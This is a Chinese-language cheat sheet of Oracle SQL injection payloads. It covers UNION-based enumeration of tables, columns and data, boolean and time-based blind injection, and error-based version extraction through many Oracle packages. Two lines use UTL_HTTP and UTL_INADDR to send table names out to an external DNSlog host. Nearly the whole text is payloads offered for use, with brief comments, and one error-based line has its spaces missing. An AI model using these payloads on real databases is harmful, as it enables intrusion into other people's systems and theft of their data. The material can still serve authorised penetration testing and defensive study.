
Oracle注入大全


联合查询注入

order by 3--

and 1=2 union select null,null,null from dual--

and 1=2 union select 'null',null,null from dual--  //返回正常,则第一个字段是数字型,返回错误,为字符型

and 1=2 union select 1,'2','3' from dual--  //判断显示位

and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual--  //探测数据库版本信息

and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual--  //查询第一个表名

and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'STUDENT'),null from dual--  //第二个表名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1),null from dual-- //查看第一个字段名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1 and column_name<>'[第一个字段名]'),null from dual-- //查看第二个字段名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1 and column_name<>'[第一个字段名]' and column_name<>'[第二个字段名]'),null from dual--  //查看第三个字段名

and 1=2 union select id,name,pass from student where id=1--  //查看数据

盲注

1、DNSlog(此方法需要 Oracle 数据库用户拥有网络访问权限,即 Oracle 11g 起由网络 ACL 控制的对外访问权限,普通应用账号默认不具备;手动添加权限参考 http://blog.itpub.net/26736162/viewspace-2072163/ )

union SELECT null,UTL_HTTP.REQUEST((select table_name from user_tables where rownum=1)||'.5nj58o.ceye.io'),null FROM DUAL--  //UTL_HTTP.REQUEST型

union SELECT null,UTL_INADDR.GET_HOST_ADDRESS((select table_name from user_tables where rownum=1)||'.5nj58o.ceye.io'),null FROM DUAL--  //UTL_INADDR.GET_HOST_ADDRESS型

2、布尔盲注

and (select count(table_name) from user_tables)>1--  //获取表的个数

and (select length(table_name) from user_tables where rownum=1)>1--  //获取第一个表的表名长度

and ascii(substr((select table_name from user_tables where rownum=1),1,1))>80--  //获取第一个表的第一个字符的Ascii码的值

3、时间盲注(慎用,会很卡)

and 1=(select decode(substr((select table_name from user_tables where rownum=1),1,1),'S',(select count(*) from all_objects),1) from dual)--  //判断第一个表名的第一个字符

报错注入(获取数据库版本信息)

and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and(selectdbms_xdb_version.uncheckout((selectbannerfromsys.v_$versionwhere rownum=1)) from dual) is not null--

and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_streams.get_information((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xmlschema.generateschema((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xmltranslations.extractxliff((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$versionwhere rownum=1),user,user)--

and 1=utl_inaddr.get_host_name((select banner from sys.v_$version where rownum=1))--

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--

and (select upper(XMLType(chr(60)||chr(58)||(select banner from sys.v_$version where rownum=1)||chr(62))) from dual) is not null--


